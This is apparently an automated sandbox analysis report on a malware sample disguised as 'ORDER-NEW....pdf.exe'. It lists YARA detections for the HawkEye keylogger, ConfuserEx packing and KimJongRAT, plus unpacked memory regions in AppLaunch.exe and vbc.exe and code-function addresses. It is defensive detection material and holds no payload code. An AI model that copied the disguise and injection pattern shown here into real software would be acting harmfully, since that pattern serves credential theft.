              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_008A47620_2_008A4762
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_012104E90_2_012104E9
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_01210E700_2_01210E70
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_012118A00_2_012118A0
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_012173A20_2_012173A2
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeCode function: 0_2_012173B00_2_012173B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054304D85_2_054304D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054354B85_2_054354B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054320685_2_05432068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05430C485_2_05430C48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05436C295_2_05436C29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05439F985_2_05439F98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054399385_2_05439938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054338E65_2_054338E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054385405_2_05438540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054305625_2_05430562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054335645_2_05433564
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054335685_2_05433568
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054345195_2_05434519
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054345285_2_05434528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054385315_2_05438531
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543053B5_2_0543053B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054305ED5_2_054305ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054305A65_2_054305A6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543E45F5_2_0543E45F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543174D5_2_0543174D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054317D45_2_054317D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054341685_2_05434168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054341785_2_05434178
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543E1B85_2_0543E1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543E30B5_2_0543E30B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433D405_2_05433D40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05431D6F5_2_05431D6F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433DDD5_2_05433DDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433DA05_2_05433DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433C735_2_05433C73
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433C1D5_2_05433C1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05430C355_2_05430C35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05431C835_2_05431C83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05431CBA5_2_05431CBA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433E755_2_05433E75
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05436E105_2_05436E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433E1A5_2_05433E1A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05431E955_2_05431E95
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054399285_2_05439928
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054339D75_2_054339D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054329E95_2_054329E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054319F65_2_054319F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054329F85_2_054329F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054339815_2_05433981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054348D05_2_054348D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054348E05_2_054348E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054318FB5_2_054318FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0543588B5_2_0543588B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_054358905_2_05435890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433B605_2_05433B60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433B1E5_2_05433B1E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433BCE5_2_05433BCE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433BF15_2_05433BF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05431BB95_2_05431BB9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433A775_2_05433A77
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433A025_2_05433A02
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433ADD5_2_05433ADD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05433AAA5_2_05433AAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C3B9905_2_09C3B990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C34C005_2_09C34C00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C300405_2_09C30040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C343105_2_09C34310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C362B85_2_09C362B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C38B605_2_09C38B60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C38B705_2_09C38B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C33FC05_2_09C33FC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C390805_2_09C39080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C390905_2_09C39090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C3001C5_2_09C3001C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C343045_2_09C34304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C3C2C65_2_09C3C2C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09C3C2C85_2_09C3C2C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E315DB5_2_09E315DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E314DD5_2_09E314DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E314155_2_09E31415
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E307785_2_09E30778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E30EA85_2_09E30EA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E312955_2_09E31295
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E311745_2_09E31174
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E311345_2_09E31134
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E3170B5_2_09E3170B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E312D55_2_09E312D5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E316675_2_09E31667
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_09E3125A5_2_09E3125A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0044900F8_2_0044900F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004042EB8_2_004042EB
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004142818_2_00414281
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004102918_2_00410291
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004063BB8_2_004063BB
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004156248_2_00415624
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0041668D8_2_0041668D
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040477F8_2_0040477F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040487C8_2_0040487C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0043589B8_2_0043589B
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0043BA9D8_2_0043BA9D
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0043FBD38_2_0043FBD3
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404DE518_2_00404DE5
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404E5618_2_00404E56
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404EC718_2_00404EC7
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404F5818_2_00404F58
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0040BF6B18_2_0040BF6B
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00415F19 appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0044468C appears 36 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004162C2 appears 87 times
